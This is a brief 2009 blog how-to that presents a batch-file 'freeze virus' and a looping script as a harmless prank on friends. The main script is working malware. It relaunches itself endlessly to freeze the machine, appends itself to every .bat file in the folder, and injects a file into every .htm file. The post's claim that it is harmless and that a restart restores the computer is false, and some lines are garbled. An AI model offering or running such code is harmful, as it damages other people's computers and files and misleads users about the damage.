Create a Harmless Freeze Virus
Monday, July 6, 2009
Leave a Comment
Steps
- Open Notepad or other word processor.
- Type on the first line, "start virus.bat," then, on the next #type the following code:
- @echo off
- for %%f in (*.bat) do copy virus.bat+%%f
- if not exist c:\fr.htm echo {{{1}}}>c:\fr.htm
- start virus.bat
-
- for %%f in (*.htm) do copy c:\fr.htm+%%fSave the file as "virus.bat" and select all files. You can change "virus" to anything you want.
- Open the file and it will open so many pointless windows, your computer will freeze.
- Shut down your computer and it will return to normal.
- Beware of angry friends
- Or try this one
- Open Notepad or other word processor.
- Type this in
- BEGIN
- REM Endless loop, Help!!
- GOTO BEGIN
- Then save as loop.bat
- Then when you open it it will keep looping Help!! and probly lag or crash a computer.
- If you want to stop it hit X.
- To change the icon of ANY short cut right click on it and select properties. Next click change icon. It might give you a error but ignore it and continue. Then select the one you want and press okay/apply.
- This could be a fun practical joke.
- You can change the filename from virus to anything you want, just as long as you change every part of the file where it says virus to your new name.
- When changing the name, be sure to keep the .bat part
0 comments »
Leave your response!